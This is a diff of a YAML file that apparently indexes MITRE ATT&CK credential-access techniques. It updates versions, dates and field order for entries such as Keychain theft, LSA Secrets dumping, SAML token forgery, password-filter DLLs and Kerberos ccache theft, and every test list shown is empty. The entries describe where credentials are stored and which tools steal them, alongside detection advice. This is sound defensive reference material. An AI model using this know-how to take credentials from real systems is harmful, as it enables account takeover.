-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -44341,65 +44960,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44408,6 +45024,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44415,31 +45034,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -44452,14 +45103,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -44500,14 +45151,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44570,81 +45218,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44729,12 +45375,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44783,38 +45428,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44838,76 +45458,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
